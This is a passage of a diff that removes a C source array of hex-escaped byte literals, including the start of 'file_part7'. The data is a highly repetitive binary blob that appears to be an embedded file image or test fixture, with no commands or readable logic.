-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1f\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x12\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x1b"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-;
-char file_part7[]=
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x4e\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x82\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\xef\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x14\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
